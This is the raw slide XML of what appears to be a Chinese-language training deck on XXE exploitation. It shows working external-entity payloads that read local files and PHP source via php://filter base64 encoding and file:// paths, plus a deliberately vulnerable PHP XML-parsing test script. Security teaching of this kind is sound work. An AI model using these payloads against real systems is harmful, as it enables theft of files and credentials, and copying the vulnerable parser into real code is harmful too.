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80" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="291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XXE漏洞利用  </a:t>
            </a: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- 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任意文件读取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90625"/>
            <a:ext cx="106006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直接利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议读取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文件会出现错误，那么需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编码来进行读取。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Payload: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&lt;?xml version="1.0" encoding="utf-8"?&gt;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&lt;!DOCTYPE ANY [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&lt;!ENTITY xxe SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php://filter/read=convert.base64-encode/resource=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.php</a:t>
            </a:r>
            <a:endParaRPr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" &gt;]&gt;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&lt;value&gt;&amp;xxe;&lt;/value&gt;</a:t>
            </a:r>
            <a:endParaRPr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778250"/>
            <a:ext cx="10074275" cy="275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15" y="4051935"/>
            <a:ext cx="6915150" cy="2209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7860" y="2855595"/>
            <a:ext cx="3727450" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="372745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3112" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="3313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测试代码介绍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14325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中测试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POC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72568" y="2885758"/>
            <a:ext cx="3375660" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="33756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读取文本文档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914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读取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373580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7860" y="2855595"/>
            <a:ext cx="3727450" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="372745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3112" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="3313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测试代码介绍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14325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中测试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POC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72568" y="2885758"/>
            <a:ext cx="3375660" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="33756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读取文本文档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914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读取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测试代码介绍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测试代码介绍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1895" y="190690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&lt;?php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$xml=file_get_contents("php://input");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$data = simplexml_load_string($xml) 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echo "&lt;pre&gt;" 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print_r($data) ;//注释掉该语句即为无回显的情况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?&gt;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中测试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中测试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93738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file:///path/to/file.ext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http://url/file.ext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php://filter/read=convert.base64-encode/resource=conf.php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46705" y="3081655"/>
            <a:ext cx="64985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读取文本文档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有回显的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XXE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5892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Payload:</a:t>
            </a:r>
            <a:endParaRPr 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&lt;?xml version="1.0" encoding="utf-8"?&gt;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&lt;!DOCTYPE ANY [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&lt;!ENTITY xxe SYSTEM "file:///c://test/flag.txt" &gt;]&gt;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&lt;value&gt;&amp;xxe;&lt;/value&gt;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990850"/>
            <a:ext cx="10377170" cy="3550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26790" y="3081020"/>
            <a:ext cx="513842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演示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测试代码介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>php中测试POC</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>读取文本文档</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>读取PHP文件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149</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-18T23:47:01Z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